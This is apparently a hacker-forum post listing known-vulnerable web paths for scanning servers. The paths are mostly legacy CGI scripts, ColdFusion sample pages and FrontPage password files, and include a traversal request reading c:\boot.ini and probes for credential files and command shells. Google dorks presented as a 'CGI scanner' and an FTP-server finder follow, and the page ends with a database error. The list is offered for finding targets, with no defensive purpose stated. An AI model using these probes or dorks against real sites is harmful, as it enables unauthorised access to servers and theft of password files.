/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples /config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/---/docs/sourcewindow.cfm
/---/email/getfile.cfm?filename=c:\boot.ini
/---/displayopenedfile.cfm
/---/exprcalc.cfm
/---/openfile.cfm
/---/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin /UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin /ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin /ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin /classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin /files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin /glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin /htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin /iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin /mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin /perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin /pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin /postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin /search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin /textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat
/cgi-bin/unlg1.1


--------------------------------------------------------------------------------

-==[Find Ftp Server]

inurl:"ftp." index.of


--------------------------------------------------------------------------------

-==[Using Google as a CGI Scanner]

inurl:cgi-bin/cgiemail/uargg.txt
inurl:random_banner/index.cgi
inurl:random_banner/index.cgi
inurl:cgi-bin/mailview.cgi
inurl:cgi-bin/maillist.cgi
inurl:cgi-bin/userreg.cgi
inurl:iissamples/ISSamples/SQLQHit.asp
inurl:iissamples/ISSamples/SQLQHit.asp
inurl:SiteServer/admin/findvserver.asp
inurl:scripts/cphost.dll
inurl:cgi-bin/finger.cgi
  Reply


Forum Jump:


Users browsing this thread: 3 Guest(s)

MyBB SQL Error

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
1017 - Can't find file: './pxramin_parsii/mybb_threadviews.MYI' (errno: 2 "No such file or directory")
Query:
INSERT INTO mybb_threadviews (tid) VALUES('462')